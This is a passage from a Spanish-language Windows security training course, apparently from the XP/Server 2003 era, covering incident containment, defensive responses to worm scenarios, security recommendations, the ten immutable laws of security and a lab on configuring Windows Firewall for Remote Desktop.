10.4. Contención de los efectos de un ataque

Cuando un sistema sufre un ataque, se debe apagar y quitar de la red, y se debe proteger el resto de los sistemas de la red.

Los servidores afectados se deben conservar y analizar, y es necesario documentar las conclusiones.

Puede ser muy difícil cumplir las normas legales para la conservación de pruebas mientras se continúan las actividades cotidianas. Con la ayuda de asesores legales, se debe desarrollar un plan detallado que permita conservar las pruebas del ataque y que cumpla los requisitos legales de su jurisdicción, de modo que pueda ponerse en práctica un plan cuando la red sufra un ataque.

11. Ejemplos de ataques

En este tema, se describirán varios escenarios de ataque. Específicamente, se tratarán los escenarios siguientes:

Un gusano ataca el puerto UDP 135 Un gusano del correo electrónico Un ataque infecta un equipo antes de aplicar revisiones o correcciones

11.1. Ataque de un gusano al puerto UDP 135

Perímetro• El servidor de seguridad de red debe bloquearlo de acuerdo con su diseño

Red• Buscar y detectar los sistemas vulnerables• Desactivar las conexiones de red en los hosts vulnerables• Utilizar cuarentena de RRAS para asegurar que los hosts de acceso

telefónico tengan aplicadas las revisiones adecuadas

Host• Utilizar IPSec para permitir el uso del puerto UDP 135 entrante sólo en los

hosts que requieran RPC• Utilizar Firewall de Windows para bloquear el tráfico entrante que no se

desea que llegue a los hosts (en Windows XP y versiones posteriores). En este ejemplo, se ha producido la proliferación de una variedad del virus Blaster. Se pueden tomar medidas en diversos niveles del modelo de defensa en profundidad para impedir que un gusano ataque el puerto de Protocolo de datagramas de usuario (UDP, User Datagram Protocol) 135.

11.2. Gusano de correo electrónico

Perímetro• Examinar todos los archivos adjuntos en la puerta de enlace SMTP

Red• Utilizar la cuarentena de RRAS para comprobar las revisiones aplicadas y las

firmas de virus

Aplicación• Microsoft Office 98• Comprobar que esté instalada la actualización de seguridad de Microsoft

Outlook® 98.• Office 2000.• Comprobar que esté instalado al menos el Service Pack 2• Office XP y Office 2003• La configuración predeterminada de zona de seguridad es sitios restringidos

(en lugar de Internet) y las secuencias de comandos activas dentro de los sitios restringidos, también están deshabilitadas de forma predeterminada

Usuarios• Enseñar a los usuarios que los archivos adjuntos pueden ser peligrosos.• Si se recibe un archivo adjunto que no se ha pedido, escribir a su autor para

comprobar el propósito antes de abrirlo

En los últimos años han aparecido muchos virus relacionados con el correo electrónico. Se pueden tomar medidas en varios niveles del modelo de defensa en profundidad para protegerse frente a los gusanos de correo electrónico. Estas precauciones requieren programas de aprendizaje específicos para que los usuarios conozcan el riesgo y sigan los procedimientos apropiados.

11.3. “Han entrado en mi sistema antes de poder aplicar ninguna revisión”

Perímetro• Habilitar o bloquear el servidor de seguridad

Red• Desconectar el cable de red

Host• Iniciar el sistema e inicie sesión• Se pueden necesitar credenciales administrativas locales si las almacenadas

en caché están deshabilitadas• Active Firewall de Windows para bloquear todo el tráfico entrante• Volver a conectar el cable de red• Descargar e instalar las revisiones apropiadas• Reiniciar el sistema• Desactivar Firewall de Windows según la directiva

• Es posible que un ataque infecte un equipo antes de que se puedan aplicar las revisiones o correcciones.

• Para impedir que se produzcan daños en otros equipos de la red mientras se lo repara, seguir estos pasos:

1. Desconectar el cable de red.2. Iniciar el sistema e iniciar sesión. Se pueden necesitar credenciales

administrativas locales si las almacenadas en caché están deshabilitadas.

3. Activar Firewall de Windows para bloquear todo el tráfico entrante.4. Volver a conectar el cable de red.5. Descargar e instale la revisión.6. Reiniciar el sistema.7. Desactive Firewall de Windows de acuerdo con la directiva.

12. Recomendaciones

En este tema, se enumerarán las recomendaciones para mejorar la seguridad. Específicamente, se tratará:

Recomendaciones de seguridad. Lista de comprobación de la seguridad.

12.1. Recomendaciones de seguridad

Defensa en profundidad Seguro por diseño Privilegios mínimos Aprender de los errores cometidos Mantener la seguridad Hacer que los usuarios se centren en la concienciación de seguridad Desarrollar y probar planes y procedimientos de respuesta a

incidentes

• Se deberá seguir el modelo de defensa en profundidad. Cada nivel del modelo está protegido por los niveles contiguos y depende de todos los niveles que se implementan.

• Hay un compromiso constante entre la funcionalidad y la seguridad. Ambos raramente se complementan. Aunque quizás en alguna ocasión lo importante haya sido la funcionalidad, ahora se busca definitivamente la seguridad. Así se facilita una implementación segura por diseño. El software y los sistemas son seguros de forma predeterminada y por diseño, con lo que se simplifica la creación de un entorno de red seguro.

• Los procesos y las aplicaciones que se ejecutan en un sistema logran este objetivo mediante un nivel definido de privilegios sobre el sistema. A menos que se configuren de otro modo, los procesos iniciados, mientras un usuario está conectado al sistema, se ejecutan con los mismos privilegios que tiene el usuario. Para impedir ataques accidentales, todos los usuarios del sistema deben iniciar sesión en él con los privilegios mínimos necesarios para realizar sus funciones. Los virus se ejecutan con los privilegios del usuario que haya iniciado la sesión. En consecuencia, los virus tendrán un ámbito mucho más amplio si el usuario inicia sesión como administrador.

• Las aplicaciones y los servicios también se deben ejecutar con los privilegios mínimos necesarios.

• Es muy importante que se entienda que la seguridad no es un objetivo: es un medio. Un entorno nunca es completamente seguro. Siguen apareciendo nuevos virus, revisiones y puntos débiles en los sistemas. Aprenda de la experiencia y conserve una documentación exhaustiva de todo lo que suceda.

• Para mantener la seguridad, implementar procedimientos de supervisión y auditoría, y comprobar que los resultados de estos procedimientos se procesan con regularidad.

• Disponer de planes y procedimientos de respuesta a incidentes claros, completos y bien comprobados, es la clave para permitir una reacción rápida y controlada ante las amenazas.

12.2. Lista de comprobación de seguridad

• La seguridad comienza por el aprendizaje y la práctica. No se debe dejar nada al azar ni permitir que los usuarios tomen sus propias decisiones sobre este tema. Documentar todo lo que ocurra y crear procedimientos y procesos para todas las funciones empresariales. Siempre que los usuarios tengan que hacer algo, deben disponer de un documento que les proporcione instrucciones paso a paso.

• Tomar la delantera manteniéndose informado de los problemas relacionados con la seguridad. Microsoft enviará boletines de seguridad a través del correo electrónico a los suscriptores. Muchos ataques se efectúan aprovechando defectos de seguridad para los que existe alguna revisión. Comprobar que se dispone de las herramientas de administración de revisiones más actualizadas.

• No olvidar realizar una defensa en profundidad. Implementar procedimientos de seguridad en todos los niveles del modelo, ya que unos dependen de otros. La seguridad de una red viene definida por su punto más débil.

• No dejar jamás de recalcar la importancia de efectuar copias de seguridad con regularidad. La pérdida o la modificación de los datos puede resultar catastrófica para un negocio. Deben llevarse a cabo copias de seguridad habitualmente. Almacenar siempre las copias de seguridad en un lugar donde no estén los datos. Realizar también procedimientos de restauración periódicamente.

• Averigüar cómo podrían atacar. Se deben conocer las herramientas de ataque de un sistema y los virus. Investigar dónde se producen los ataques y cómo. La encuesta sobre seguridad y delitos informáticos de CSI/FBI puede ser un buen lugar para comenzar.

13. Diez normas de seguridad inmutables

En este tema final, se enumerarán las diez normas inmutables de seguridad.

Cap1-27.jpg

1. Cuando se elige ejecutar un programa, se está tomando la decisión de conceder el control del equipo. Una vez que se ejecuta un programa, se puede realizar cualquier acción, hasta un límite que viene determinado.

2. Al fin y al cabo, un sistema operativo sólo es un conjunto de unos y ceros que, al ser interpretados por el procesador, provocan que el equipo realice determinadas acciones. Al cambiar los unos y ceros, hará algo diferente. ¿Dónde se almacenan los unos y ceros? Pues en el equipo, junto con todo lo demás. Son simplemente archivos y, si se permite cambiarlos a los otros usuarios que utilizan el equipo, se "pierde la partida".

3. Si alguien dispone de acceso físico a un equipo, tiene control total sobre él y puede realizar cualquier acción que desee, como modificar datos o robarlos, llevarse el hardware o destruir físicamente el equipo.

4. Si se administra un sitio Web, se tiene que limitar lo que pueden hacer en él los visitantes. Sólo se debe permitir que se ejecute un programa en el sitio si lo escribe uno mismo o si se confía en quien lo ha desarrollado. Pero posiblemente esto no sea suficiente. Si el sitio Web es uno de los que se alojan en un servidor compartido, se deben tomar precauciones adicionales. Alguien con no muy buenas intenciones puede comprometer uno de los demás sitios del servidor y es posible que pueda extender su

control al propio servidor y, por lo tanto, controlar todos los sitios que contenga, incluido el de uno.

5. Si un intruso puede averiguar su contraseña, podrá iniciar sesión en el equipo y realizar en él todas las acciones que puede hacer uno. Utilizar siempre una contraseña; resulta increíble el número de cuentas que tienen contraseñas en blanco. Y elegir una compleja. No utilizar el nombre de un perro, fecha de aniversario ni el nombre de un equipo de fútbol favorito. No emplear la palabra contraseña.

6. Un administrador poco confiable puede anular el resto de medidas de seguridad que haya aplicado. Puede cambiar los permisos del equipo, modificar las directivas de seguridad del sistema, instalar software peligroso y suplantar a los usuarios, o realizar muchas otras acciones diferentes. Puede sabotear prácticamente cualquier medida de protección del sistema operativo, puesto que lo controla. Y lo que es peor, puede borrar sus huellas. Si el administrador no es de confianza, el sistema no tendrá ninguna seguridad en absoluto.

7. Muchos sistemas operativos y productos de software de criptografía dan la opción de almacenar las claves criptográficas en el equipo. La ventaja es la comodidad: no hay que ocuparse de la clave; pero esto es a costa de la seguridad. Las claves se suelen disimular (es decir, se ocultan) y algunos de los métodos para descubrirlas son bastante buenos. Pero, al final, no importa lo bien oculta que esté la clave: si se halla en el equipo, es posible encontrarla. Tiene que ser posible encontrarla; después de todo, el software puede encontrarla, así que alguien suficientemente motivado también podrá. Siempre que sea posible, se deben guardar las claves en otro lugar.

8. Los detectores de virus comparan los datos de un equipo con un conjunto de firmas de virus. Cada firma es característica de un virus en particular y, cuando el detector encuentra en un archivo, en un mensaje de correo electrónico o en algún otro lugar datos que coincidan con la firma, determina que ha encontrado un virus. Sin embargo, un detector de virus sólo puede encontrar los virus que conoce. Es vital mantener el archivo de firmas del detector de virus actualizado porque cada día se crean virus nuevos.

9. La mejor forma de proteger la privacidad en Internet es igual que en la vida normal: con forma de actuar. Leer las declaraciones de privacidad de los sitios Web que se visitan y realizar transacciones sólo con aquellos con cuyas prácticas se está de acuerdo. Si preocupan los cookies, deshabilitarlos. Especialmente, no explorar la Web de forma indiscriminada: sabemos que la mayor parte de las ciudades tienen una zona que es mejor evitar, e Internet es igual.

10.Una seguridad perfecta requiere un grado de perfección que simplemente no existe en realidad y que no es probable que exista nunca. Esto es cierto tanto en el software como en casi todos los campos de interés humano. El desarrollo de software es una ciencia imperfecta y casi todo el software tiene errores. Algunos de ellos se pueden aprovechar para

infringir la seguridad. Esto es la realidad. Pero aunque el software pudiera ser perfecto, con ello no se solucionaría todo el problema. La mayor parte de los ataques implican, en cierto grado, alguna manipulación de la naturaleza humana, en lo que se suele denominar estratagemas sociales. Si se aumenta el costo y la dificultad de atacar la tecnología de seguridad, quienes tengan malas intenciones responderán cambiando el modo de actuar y pasarán a centrarse en la persona que se encuentra tras la consola en lugar de en la tecnología. Es vital conocer la función de mantenimiento de una seguridad sólida; en caso contrario sólo uno podría convertirse en el punto débil del blindaje de los sistemas.

Para ver el artículo completo acerca de las diez normas inmutables de seguridad, dirigirse a:http://www.microsoft.com/technet/columns/security/essays/10imlaws.asp (este sitio está en inglés)

Práctica 1: Habilitar Firewall de Windows y Configurar Firewall de Windows para permitir el acceso al puerto 3389

Ejercicio 1: Crear una conexión a escritorio remoto

1. Inicie sesion en Windows XP ó Windows Server 20032. Desde start – Run escriba “mstsc.exe” y presione enter.3. En el campo Computer escriba el nombre o dirección IP de la

computadora remota.4. Luego presione el botón Connect.5. El sistema remoto le pedirá credenciales.

Ejercicio 2: Cómo configurar Firewall de Windows para denegar la conexión.

Este ejercicio lo deberá realizar en la computadora remota.

1. Edite las propiedades de conexión del adaptador de red.2. Seleccione el tab “Advanced”3. Luego deje una marca en el cuadro “Internet Connection Firewall”4. Edite la configuración del Firewall desde el boton “Settings”5. Verifique que no hay servicios habilitados.6. Presione dos veces en la opción OK7. Verifique la conexión al escritorio remoto desde la otra computadora.

Ejercicio 3: Cómo configurar Firewall de Windows para permitir el uso del puerto 3389

Este ejercicio lo deberá realizar en la computadora remota.

1. Edite la configuración de Firewall presionando el botón “Settings”2. Haga una marca en el cuadro Remote Desktop.3. Presione dos veces en OK4. Verifique la conexión al escritorio remoto desde otra computadora.5. Verifique la conexión a otros servicios.

14.Resumen del capitulo

Caso práctico Disciplina de administración de riesgos de seguridad Defensa en profundidad Respuesta a incidentes de seguridad Ejemplos de ataques Recomendaciones Diez normas de seguridad inmutables

Este capitulo ha sido una introducción a los fundamentos de la implementación de un entorno de equipo seguro. Éste es un tema muy extenso y complejo que requiere una atención continuada y una mejora constante de los conocimientos, procesos y procedimientos.

15.Pasos siguientes

Obtener aprendizaje de seguridad adicional Buscar seminarios de aprendizaje en línea: http://www.microsoft.com/seminar/events/security.mspx (este sitio está en

inglés) Buscar un CTEC local que ofrezca cursos prácticos:

http://www.microsoft.com/mspress/latam/default.htm Implementar una solución de administración de revisiones Buscar información de orientación y herramientas:

http://www.microsoft.com/technet/security/topics/patch/default.mspx (este sitio está en inglés)

Mantenerse informado sobre la seguridad: Suscribirse a boletines de seguridad:

http://www.microsoft.com/security/security_bulletins/alerts2.asp (este sitio está en inglés)

Obtener las directrices de seguridad de Microsoft más recientes: http://www.microsoft.com/technet/security/bestprac/ (este sitio está en inglés)

Los pasos siguientes incluyen ir al sitio Web de Microsoft para:

Obtener aprendizaje de seguridad adicional. Buscar orientación sobre la implementación de una solución de

administración de revisiones. Obtener la información sobre seguridad más reciente.

16. Para obtener más información

Hay más información técnica para profesionales de IT y desarrolladores en los sitios Web siguientes:

Sitio de seguridad de Microsoft (todos los usuarios): http://www.microsoft.com/latam/seguridad

Sitio de seguridad de TechNet (profesionales de IT): http://www.microsoft.com/latam/technet/seguridad/default.asp

Sitio de seguridad de MSDN (desarrolladores). http://msdn.microsoft.com/security (este sitio está en inglés)